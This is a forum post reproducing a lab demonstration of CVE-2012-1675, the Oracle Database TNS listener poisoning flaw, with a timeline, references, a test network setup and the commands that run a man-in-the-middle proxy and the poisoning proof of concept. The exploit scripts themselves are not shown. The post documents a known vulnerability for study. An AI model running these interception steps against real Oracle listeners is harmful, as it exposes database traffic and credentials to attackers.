Jump to content
Nytro

CVE-2012-1675 Oracle Database TNS Poison 0Day Video Demonstration

By Nytro, in Tutoriale video

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

[h=1]CVE-2012-1675 Oracle Database TNS Poison 0Day Video Demonstration[/h]

[h=4]Timeline :[/h] Vulnerability discovered by Joxean Koret in 2008

Vulberability reported to the vendor by Joxean Koret in 2008

Public release of the vulnerability in Oracle CPU by the vendor the 2012-04-17

Details and PoC of the vulnerability released by Joxean Koret the 2012-04-18

Fake patching of the vulnerability discovered by Joxean Koret the 2012-04-26

[h=4]PoC provided by :[/h] Joxean Koret

[h=4]Reference(s) :[/h] Oracle CPU of April 2012

Joxean Koret details and PoC

CVE-2012-1675

Oracle Security Alert for CVE-2012-1675

[h=4]Affected version(s) :[/h] All versions of Oracle Database

[h=4]Tested with :[/h] Oracle Database 10g Enterprise Edition Release 10.2.0.4.0

[h=4]Description :[/h] oracle-tns-poison.png

Usage of Joxean Koret PoC require that the database name has a length of 6 characters.

Database server characteristics :

IP : 192.168.178.150

Oracle version : 10.2.0.4.0

Database listener port : 1521

Database listener has no clients IPs restrictions

Database name : arcsig

Database username : arcsig

Database password : testtest

Database client characteristics :

IP : 192.168.178.151

SQL*Plus version : 10.2.0.4.0

tnsnames.ora” file as bellow :

TARGET.DB=

(DESCRIPTION =

(ADDRESS = (PROTOCOL = TCP)(HOST = 192.168.178.150)(PORT = 1521))

(CONNECT_DATA =

(SERVICE_NAME= arcsig)

)

)

Attacker characteristics :

IP : 192.168.178.100

Usage of PoC provided by Joxean Koret

[h=4]Demonstration :[/h] PoC validation phase

On database server :

ifconfig

ps faux

netstat -tan

On database client :

ifconfig

sqlplus -v

cat tnsnames.ora

sqlplus arcsig@TARGET.DB

HELP

QUIT

PoC exploitation phase

On attacker :

Start the MITM proxy, how will intercept the communication between the client and the database :

sudo python proxy.py -l 192.168.178.100 -p 1521 -r 192.168.178.150 -P 1521

Start the vulnerability exploitation :

python tnspoisonv1.py 192.168.178.100 1521 arcsig 192.168.178.150 1521

On the database client :

Connect with SQL*Plus

sqlplus arcsig@TARGET.DB

?

? INDEX

TOTO

QUIT

You can see that the communication are intercepted by the proxy.

Sursa: CVE-2012-1675 Oracle Database TNS Poison 0Day Video Demonstration

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...